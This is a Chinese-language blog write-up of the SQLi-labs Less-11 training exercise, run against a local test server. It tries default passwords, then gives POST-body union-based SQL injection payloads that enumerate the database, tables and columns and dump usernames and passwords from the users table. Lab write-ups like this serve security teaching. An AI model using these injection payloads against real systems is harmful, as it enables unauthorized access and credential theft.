当前位置: 首页 > news >正文

POST 数据提交注入测试sqlilabs less 11

尝试简单的账号和密码
root,root
admin,admin
123456,123456
root,admin
admin,root
admin,123456
root,123456
发现admin,admin就能登进去但是纯属巧合
还是正经尝试sql注入
2.尝试sql注入
http://127.0.0.1:8081/Less-11/?id=1
http://127.0.0.1:8081/Less-11/?id=1 and 1=1
http://127.0.0.1:8081/Less-11/?id=1 and 1=2
这个输进去都是Welcome   Dhakkan
没有变化
尝试单引号,双引号,字符型这种
http://127.0.0.1:8081/Less-11/?id=1'
http://127.0.0.1:8081/Less-11/?id=1' and '1'='1
http://127.0.0.1:8081/Less-11/?id=1' and '1'='1
Welcome   Dhakkan
http://127.0.0.1:8081/Less-11/?id=1"
http://127.0.0.1:8081/Less-11/?id=1" and "1"="1
http://127.0.0.1:8081/Less-11/?id=1" and "1"="1

Welcome   Dhakkan

那么应该就是尝试get或者是post进行传参可以去检查一下是不是满足我设想的思路发现:源码如图所示,满足我的思路

发现了uname和passwd都上了单引号,并且使用的是post传参,那么就可以使用bp或者hackbar来进行post传参

3.先使用bp来尝试传参吧

输入uname:1,passwd:1,再index.php输入echo sql,让sql语句显示出来更方便我们进行sql注入

4.找列数得到列数为2

5.联合查询找到,your login name:1,your password:2

6.sql的注入来查找数据库,user,id,password啥的进行尝试

uname=1' union select 1, database()--+ &passwd=1&submit=Submit

database():security

最后:

database():security

user():root@localhost

version():5.7.26

@@version_compile_os:Win64

然后去数据库里找表名,用户名,密码

6.uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1 --+ &passwd=1&submit=Submit

在这里发现了users表

然后去查列

uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security'--+ &passwd=1&submit=Submit

然后去找password和username

uname=1' union select group_concat(username),group_concat(password) from users--+ &passwd=1&submit=Submit

uname=1' union select group_concat(username),group_concat(password) from users limit 0,1--+ &passwd=1&submit=Submit

7.最后尝试登录

Your Login name:admin2
Your Password:admin2

Your Login name:admin1
Your Password:admin1

8.尝试去hackbar尝试得到数据

收工收工

http://www.dtcms.com/a/552948.html

相关文章:

  • 微服务高并发设计考虑要点
  • 解码LVGL Linux 系统(Ubuntu/WSL + 开发板)移植
  • 长春网站制作昆明君创网络科技有限公司
  • 把 CLI 搬上 Web:在内网打造“可二开”的 AI IDE,为什么这条路更现实?
  • iOS 上架应用市场全流程指南,App Store 审核机制、证书管理与跨平台免 Mac 上传发布方案(含开心上架实战)
  • 酒厂网站源码now9999网站提示建设中
  • iOS 中的引用计数
  • C++多线程运行整理
  • 【渲染引擎基础】圣杯架构——固定逻辑时长+插值渲染
  • iOS 崩溃日志分析工具全指南,多工具协同构建稳定性分析体系
  • 做网站推广的难点、襄阳地区网站做的好的
  • 从U-Net到U-Net++:图像分割网络的进阶之路
  • 打工人日报#20251031
  • Huggingface的国内镜像
  • 软件测试工程师面试准备
  • Applications Manager 仪表盘:新增功能亮点
  • 怎样做网站表白网站策划与建设阶段的推广
  • 持续更新|第12弹:基于yolo算法识别的物体抓取
  • 使用Requests和正则表达式实现京东投影仪商品数据爬取
  • rabbitmq-k8s下双架构镜像+手动sts部署完全文档(下)
  • 仿RabbitMQ实现消息队列(二)-安装
  • 三网合一营销型全网站wordpress的功能简介
  • 鸿蒙分布式数据服务(DDS)原理与企业同步实战
  • 《pygame中Sprite类实现多帧动画》注-显示静态图片2-2
  • 2025年10月31日Github流行趋势
  • 深入浅出wpf学习总结
  • 建搜索引擎网站做欧洲电商看哪个网站
  • 【Linux网络】实现一个简单的聊天室
  • HTTPS接口国密安全设计-示例
  • 通过nginx+openssl自签名证书部署https应用并解决不安全问题